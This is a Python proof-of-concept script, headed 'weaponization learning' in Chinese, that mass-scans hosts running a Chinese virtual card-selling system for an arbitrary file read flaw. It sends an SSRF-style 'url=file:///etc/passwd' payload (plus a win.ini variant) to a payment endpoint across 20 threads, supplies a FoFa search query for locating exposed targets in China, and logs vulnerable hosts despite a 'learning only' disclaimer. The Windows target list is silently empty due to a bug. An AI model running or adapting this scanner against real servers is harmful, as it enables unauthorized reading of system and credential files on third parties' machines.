[武器化學習] 鯨髮卡系統虛擬卡系統任意檔案讀取漏洞poc

#!/usr/bin/env python3
import requests
from termcolor import colored
from tqdm import tqdm
from concurrent.futures import ThreadPoolExecutor, as_completed ,CancelledError
import os
import signal
import sys

print('''

本程式僅用於交流學習使用,任何未經授權的滲透測試都是違法行為                    
                                                                          
/|                  __  __   ___                           __.....__      
||                 |  |/  `.'   `.             _     _ .-''         '.    
||                 |   .-.  .-.   '      /\    \\   ///     .-''"'-.  `.  
||  __        __   |  |  |  |  |  |      `\\  //\\ ///     /________\   \ 
||/'__ '.  .:--.'. |  |  |  |  |  |  _    _\`//  \'/ |                  | 
|:/`  '. '/ |   \ ||  |  |  |  |  | | '  / |\|   |/  \    .-------------' 
||     | |`" __ | ||  |  |  |  |  |.' | .' | '        \    '-.____...---. 
||\    / ' .'.''| ||__|  |__|  |__|/  | /  |           `.             .'  
|/\'..' / / /   | |_              |   `'.  |             `''-...... -'    
'  `'-'`  \ \._,\ '/              '   .'|  '/                             
           `--'  `"                `-'  `--'     https://github.com/bamuwe
      ''')
print("漏洞名稱：鯨髮卡系統虛擬卡系統任意檔案讀取漏洞\n")

for filename in ['urls.txt', 'result.txt']:
    if not os.path.exists(filename):
        with open(filename, 'w') as f:
            print(f"[*] Created successfully {filename}")

print(r'[!] Usage : echo \'http://example.com\' > urls.txt && python3 poc.py')
print('[!] FoFa = "/static/theme/maowang51/css/style.css" && status_code="200" && country="CN"')
print()

if not os.path.exists('urls.txt'):
    print('urls.txt is empty')
    exit(0)
    
should_stop = False
def signal_handler(sig, frame):
    global should_stop
    should_stop = True
    print("\nInterrupt signal received and trying to stop the program...")
    sys.exit(0)

signal.signal(signal.SIGINT, signal_handler)

# 處理每個目標URL的函式
def process_target(target):
    try:
        response = requests.get(target)
        if response.status_code == 200 and ('root' in response.text or 'for' in response.text):
            return target
    except requests.RequestException as e:
        pass


def main():
    global SuccessCount
    SuccessCount = 1

    with open('urls.txt') as fi:
        targets = [line.strip() + '/pay/xinhui/request_post?url=file:///etc/passwd&post_data[1]=aaa' for line in fi]
        targets_windows = [line.strip() + '/pay/xinhui/request_post?url=file:///C:/windows/win.ini&post_data[1]=aaa' for line in fi]

    pbar = tqdm(total=len(targets + targets_windows), desc='process')

    with ThreadPoolExecutor(max_workers=20) as executor:
            futures = []
            for target in targets + targets_windows:
                future = executor.submit(process_target, target)
                future.add_done_callback(lambda p: pbar.update())
                futures.append(future)

            for future in as_completed(futures):
                if should_stop:
                    try:
                        future.cancel()
                    except CancelledError:
                        pass
                    continue
                result = future.result()
                if result:
                    pbar.write(colored(f"{SuccessCount}. {result} Vulnerable", 'green'))
                    with open('result.txt', 'a') as f:
                        f.write(result + '\n')
                    SuccessCount += 1

    pbar.close()
    print(colored(f"All targets have been processed {SuccessCount-1} vulnerable targets found", 'cyan'))

if __name__ == '__main__':
    main()